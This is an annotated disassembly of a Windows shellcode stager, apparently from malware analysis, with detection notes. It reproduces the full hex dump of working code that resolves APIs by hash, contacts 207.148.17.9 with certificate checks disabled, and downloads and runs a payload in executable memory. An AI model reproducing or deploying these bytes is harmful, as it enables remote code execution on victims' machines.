- Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 6a 50 e8 b0 00 00 00 2f 79 6d 42 4e 43 54 46 51 36 43 67 38 4c 54 30 73 5a 72 4c 66 4f 77 55 2d 6b 65 32 42 53 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 32 30 37 2e 31 34 38 2e 31 37 2e 39 00
; Entry stub (32-bit x86, Intel syntax, emulator/disassembler listing).
; The call below is used for its side effect: it leaves 0x00000006 on the stack, and the code at 0x88 pops that value into ebp.
- 0x00000000 fc cld ; clear DF so the lodsb loops that follow read forward
- 0x00000001 e882000000 call 0x00000088 ; pushes 0x06 (start of the API-resolver routine) and skips over it
; Hash-based API resolver, reached through every `call ebp` later in the listing.
; In:  [esp+4] at entry = 32-bit hash of the wanted export (the value pushed just before each `call ebp`).
; Out: jumps into the resolved function with the caller's return address on top of the stack and the hash argument removed.
; Offsets below match the 32-bit Windows PEB / loader-data / PE export-directory layout.
; Analyst note: no import names appear as strings; only the ror-13 hashes do, so static string search will not show the API set.
- 0x00000006 60 pushad ; save all registers; the saved-eax slot is overwritten later with the resolved address
- 0x00000007 89e5 mov ebp,esp ; frame base: [ebp+36] = requested hash (32 bytes of pushad + 4 bytes of return address)
- 0x00000009 31c0 xor eax,eax
- 0x0000000b 648b5030 fs: mov edx,dword [eax + 48] ; edx = fs:[0x30], the PEB pointer
- 0x0000000f 8b520c mov edx,dword [edx + 12] ; edx = PEB loader data
- 0x00000012 8b5214 mov edx,dword [edx + 20] ; edx = first entry of the in-memory-order module list
- 0x00000015 8b7228 mov esi,dword [edx + 40] ; per-module loop head: esi = module name buffer (UTF-16)
- 0x00000018 0fb74a26 movzx ecx,word [edx + 38] ; ecx = byte length field of the module name, used as the loop count
- 0x0000001c 31ff xor edi,edi ; edi = running module-name hash
- 0x0000001e ac lodsb
- 0x0000001f 3c61 cmp al,97 ; 97 = 'a'
- 0x00000021 7c02 jl 0x00000025
- 0x00000023 2c20 sub al,32 ; fold lower case to upper case so the hash is case-insensitive
- 0x00000025 c1cf0d ror edi,13
- 0x00000028 01c7 add edi,eax ; hash = ror(hash, 13) + byte
- 0x0000002a e2f2 loop 0x0000001e
- 0x0000002c 52 push edx ; save current module-list entry
- 0x0000002d 57 push edi ; save module hash; read back below as [ebp - 8]
- 0x0000002e 8b5210 mov edx,dword [edx + 16] ; edx = module base address
- 0x00000031 8b4a3c mov ecx,dword [edx + 60] ; ecx = e_lfanew (offset of the PE header)
- 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120] ; ecx = export directory RVA
- 0x00000038 e348 jecxz 0x00000082 ; module has no export table: move to the next module
- 0x0000003a 01d1 add ecx,edx ; ecx = export directory address
- 0x0000003c 51 push ecx
- 0x0000003d 8b5920 mov ebx,dword [ecx + 32] ; AddressOfNames RVA
- 0x00000040 01d3 add ebx,edx
- 0x00000042 8b4918 mov ecx,dword [ecx + 24] ; NumberOfNames; names are scanned from last to first
- 0x00000045 e33a jecxz 0x00000081 ; all names tried without a match: move to the next module
- 0x00000047 49 dec ecx
- 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
- 0x0000004b 01d6 add esi,edx ; esi = export name string
- 0x0000004d 31ff xor edi,edi ; edi = running function-name hash
- 0x0000004f ac lodsb
- 0x00000050 c1cf0d ror edi,13
- 0x00000053 01c7 add edi,eax
- 0x00000055 38e0 cmp al,ah ; ah is 0 here, so this stops after the terminating NUL has been hashed
- 0x00000057 75f6 jnz 0x0000004f
- 0x00000059 037df8 add edi,dword [ebp - 8] ; combined hash = function-name hash + module-name hash
- 0x0000005c 3b7d24 cmp edi,dword [ebp + 36] ; compare with the hash the caller pushed
- 0x0000005f 75e4 jnz 0x00000045
- 0x00000061 58 pop eax ; eax = export directory address saved at 0x3c
- 0x00000062 8b5824 mov ebx,dword [eax + 36] ; AddressOfNameOrdinals RVA
- 0x00000065 01d3 add ebx,edx
- 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2] ; ordinal for the matched name index
- 0x0000006b 8b581c mov ebx,dword [eax + 28] ; AddressOfFunctions RVA
- 0x0000006e 01d3 add ebx,edx
- 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
- 0x00000073 01d0 add eax,edx ; eax = address of the resolved export
- 0x00000075 89442424 mov dword [esp + 36],eax ; overwrite the saved-eax slot of the pushad frame so popad restores it into eax
- 0x00000079 5b pop ebx ; discard saved module hash
- 0x0000007a 5b pop ebx ; discard saved module-list entry
- 0x0000007b 61 popad
- 0x0000007c 59 pop ecx ; ecx = caller's return address
- 0x0000007d 5a pop edx ; drop the hash argument
- 0x0000007e 51 push ecx ; put the return address back so the API returns straight to the caller
- 0x0000007f ffe0 jmp eax ; tail-jump into the resolved API
- 0x00000081 5f pop edi ; next-module path: drop the saved export directory pointer
- 0x00000082 5f pop edi ; drop the saved module hash
- 0x00000083 5a pop edx ; restore the module-list entry
- 0x00000084 8b12 mov edx,dword [edx] ; follow the forward link to the next loaded module
- 0x00000086 eb8d jmp 0x00000015
; Main body: loads wininet and opens an internet session, then starts pushing the arguments of the connect call.
; The quoted strings printed by the tool after the hash pushes ('&wL', 'yV:') are just the hash bytes rendered as ASCII and carry no meaning.
- 0x00000088 5d pop ebp ; ebp = 0x06, address of the resolver; every later `call ebp` goes through it
- 0x00000089 686e657400 push 0x0074656e--> 'ten' ; "net\0" (little-endian)
- 0x0000008e 6877696e69 push 0x696e6977--> 'iniw' ; "wini"; the stack now holds the string "wininet"
- 0x00000093 54 push esp ; argument: pointer to "wininet"
- 0x00000094 684c772607 push 0x0726774c--> '&wL' ; API hash consumed by the resolver
- 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
- 0x0000009b 31db xor ebx,ebx ; ebx = 0, reused as the NULL/zero argument from here on
- 0x0000009d 53 push ebx
- 0x0000009e 53 push ebx
- 0x0000009f 53 push ebx
- 0x000000a0 53 push ebx
- 0x000000a1 53 push ebx ; five zero arguments: no user-agent string, default access type, no proxy, no flags
- 0x000000a2 683a5679a7 push 0xa779563a--> 'yV:' ; API hash
- 0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA
- 0x000000a9 53 push ebx ; the next six pushes are the trailing arguments of the connect call completed at 0xd5
- 0x000000aa 53 push ebx
- 0x000000ab 6a03 push 3 ; service type 3 (HTTP)
- 0x000000ad 53 push ebx
- 0x000000ae 53 push ebx
- 0x000000af 6a50 push 80 ; server port 80
- 0x000000b1 e8b0000000 call 0x00000166 ; call-over-data: pushes 0xb6, the address of the inline request path, and jumps past it
; NOTE(review): 0xb6-0xd4 is inline DATA, not code. The hex dump shows the NUL-terminated ASCII string
; "/ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS" here (the HTTP request path); the linear disassembly below mis-decodes it as instructions.
; Real code resumes at 0xd5 (the target of `call 0x000000d5` at 0x167), so the rows from 0xd4 to 0xe4 are also mis-aligned.
; Decoding the hex dump from 0xd5 gives:
;   0xd5 50          push eax         ; session handle returned by InternetOpenA
;   0xd6 6857899fc6  push 0xc69f8957  ; API hash not resolved by the tool; presumably wininet.dll!InternetConnectA (confirm against a hash table)
;   0xdb ffd5        call ebp
;   0xdd 89c6        mov esi,eax      ; esi = connection handle
;   0xdf 53          push ebx
;   0xe0 680032e084  push 0x84e03200  ; request flags; decodes as reload, no-cache-write, SECURE, keep-connection, no-auto-redirect, ignore cert CN/date errors, no-UI
;   0xe5 53 / 0xe6 53                 ; push ebx, push ebx
; The listing is back in sync with the real instruction stream at 0xe7.
; Detection note: the SECURE flag together with port 80 means TLS is spoken on a port normally used for clear-text HTTP.
- 0x000000b6 2f das ; data: '/'
- 0x000000b7 796d jns 0x00000126 ; data: "ym"
- 0x000000b9 42 inc edx ; data: 'B'
- 0x000000ba 4e dec esi ; data: 'N'
- 0x000000bb 43 inc ebx ; data: 'C'
- 0x000000bc 54 push esp ; data: 'T'
- 0x000000bd 46 inc esi ; data: 'F'
- 0x000000be 51 push ecx ; data: 'Q'
- 0x000000bf 3643 ss: inc ebx ; data: "6C"
- 0x000000c1 67384c5430 cmp byte [esp + edx * 2 + 48],cl ; data: "g8LT0"
- 0x000000c6 735a jnc 0x00000122 ; data: "sZ"
- 0x000000c8 724c jc 0x00000116 ; data: "rL"
- 0x000000ca 664f dec edi ; data: "fO"
- 0x000000cc 7755 ja 0x00000123 ; data: "wU"
- 0x000000ce 2d6b653242 sub eax,0x4232656b ; data: "-ke2B"
- 0x000000d3 53 push ebx ; data: 'S'
- 0x000000d4 005068 add byte [eax + 104],dl ; first byte is the string's NUL terminator; the rest belongs to the code at 0xd5
- 0x000000d7 57 push edi ; mis-aligned: middle of `push 0xc69f8957`
- 0x000000d8 899fc6ffd589 mov dword [edi - 1982464058],ebx ; mis-aligned: contains the `call ebp` at 0xdb
- 0x000000de c6536800 mov byte [ebx + 104],0 ; mis-aligned
- 0x000000e2 32e0 xor ah,al ; mis-aligned: middle of `push 0x84e03200`
- 0x000000e4 845353 test byte [ebx + 83],dl ; mis-aligned: last flag byte plus two `push ebx`
- 0x000000e7 53 push ebx ; in sync again
- 0x000000e8 57 push edi ; edi = pointer to the inline request path (popped at 0x166)
- 0x000000e9 53 push ebx ; NULL verb
- 0x000000ea 56 push esi ; connection handle
- 0x000000eb 68eb552e3b push 0x3b2e55eb--> ';.U' ; API hash
- 0x000000f0 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
; Relax certificate checking on the request handle, send the request, and retry on failure.
; Loop: up to 10 attempts (edi), 5000 ms sleep between attempts, process exit when the counter reaches zero.
- 0x000000f2 96 xchg eax,esi ; esi = request handle returned by HttpOpenRequestA
- 0x000000f3 6a0a push 10
- 0x000000f5 5f pop edi ; edi = retry counter (10)
- 0x000000f6 6880330000 push 0x00003380 ; option value placed on the stack; decodes as ignore unknown CA, wrong usage, revocation, cert CN and cert date
- 0x000000fb 89e0 mov eax,esp ; eax = pointer to that value
- 0x000000fd 6a04 push 4 ; buffer length
- 0x000000ff 50 push eax
- 0x00000100 6a1f push 31 ; option 31 (security flags)
- 0x00000102 56 push esi
- 0x00000103 6875469e86 push 0x869e4675--> 'Fu' ; API hash
- 0x00000108 ffd5 call ebp --> wininet.dll!InternetSetOptionA
- 0x0000010a 53 push ebx
- 0x0000010b 53 push ebx
- 0x0000010c 53 push ebx
- 0x0000010d 53 push ebx ; no extra headers, no request body
- 0x0000010e 56 push esi
- 0x0000010f 682d06187b push 0x7b18062d--> '{-' ; API hash
- 0x00000114 ffd5 call ebp --> wininet.dll!HttpSendRequestA
- 0x00000116 85c0 test eax,eax
- 0x00000118 7516 jnz 0x00000130 ; non-zero return = request sent, continue to the download stage
- 0x0000011a 6888130000 push 0x00001388 ; 0x1388 = 5000 ms
- 0x0000011f 6844f035e0 push 0xe035f044--> '5D' ; API hash
- 0x00000124 ffd5 call ebp --> kernel32.dll!Sleep
- 0x00000126 4f dec edi
- 0x00000127 75cd jnz 0x000000f6 ; retry while attempts remain
- 0x00000129 68f0b5a256 push 0x56a2b5f0 ; API hash; also the failure target of the read loop at 0x15a
- 0x0000012e ffd5 call ebp --> kernel32.dll!ExitProcess
; Download stage: allocate a 4 MiB read/write/execute buffer, fill it from the HTTP response in 8 KiB reads, then transfer control to it.
; Detection note: an RWX private allocation filled from a network read and then executed is the behaviour to alert on here;
; the response body is never written to disk by this code.
- 0x00000130 6a40 push 64 ; protection 0x40 (execute + read + write)
- 0x00000132 6800100000 push 4096 ; allocation type 0x1000 (commit)
- 0x00000137 6800004000 push 0x00400000 ; size: 4 MiB
- 0x0000013c 53 push ebx ; address: NULL, let the system choose
- 0x0000013d 6858a453e5 push 0xe553a458--> 'SX' ; API hash
- 0x00000142 ffd5 call ebp --> kernel32.dll!VirtualAlloc
- 0x00000144 93 xchg eax,ebx ; ebx = write cursor, starts at the buffer base
- 0x00000145 53 push ebx ; saved buffer base; becomes the target of the final ret
- 0x00000146 53 push ebx ; stack slot reused as the bytes-read output variable
- 0x00000147 89e7 mov edi,esp ; edi = pointer to the bytes-read slot
- 0x00000149 57 push edi ; read loop head: pointer to bytes-read
- 0x0000014a 6800200000 push 0x00002000 ; read up to 8192 bytes per call
- 0x0000014f 53 push ebx ; destination = current write cursor
- 0x00000150 56 push esi ; request handle
- 0x00000151 68129689e2 push 0xe2899612 ; API hash
- 0x00000156 ffd5 call ebp --> wininet.dll!InternetReadFile
- 0x00000158 85c0 test eax,eax
- 0x0000015a 74cd jz 0x00000129 ; read failed: take the ExitProcess path
- 0x0000015c 8b07 mov eax,dword [edi] ; eax = bytes read by this call
- 0x0000015e 01c3 add ebx,eax ; advance the write cursor
- 0x00000160 85c0 test eax,eax
- 0x00000162 75e5 jnz 0x00000149 ; keep reading until a call returns zero bytes
- 0x00000164 58 pop eax ; discard the bytes-read slot
- 0x00000165 c3 ret ; pops the saved buffer base: execution continues at the start of the downloaded data
; Second call-over-data stub, reached from the call at 0xb1.
; NOTE(review): 0x16c-0x178 is inline DATA, not code. The hex dump shows the NUL-terminated ASCII string "207.148.17.9" here,
; which the call at 0x167 leaves on the stack as the server-name argument of the connect call at 0xd5.
; The string is a network indicator for this sample, together with port 80 and the request path stored at 0xb6.
- 0x00000166 5f pop edi ; edi = 0xb6, pointer to the inline request path pushed by the call at 0xb1
- 0x00000167 e869ffffff call 0x000000d5 ; pushes 0x16c (pointer to the host string) and resumes the real code at 0xd5
- 0x0000016c 3230 xor dh,byte [eax] ; data: "20"
- 0x0000016e 37 aaa ; data: '7'
- 0x0000016f 2e313438 cs: xor dword [eax + edi],esi ; data: ".148"
- 0x00000173 2e3137 cs: xor dword [edi],esi ; data: ".17"
- 0x00000176 2e3900 cs: cmp dword [eax],eax ; data: ".9" followed by the NUL terminator
- Byte Dump:
- ......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSjP...../ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...207.148.17.9.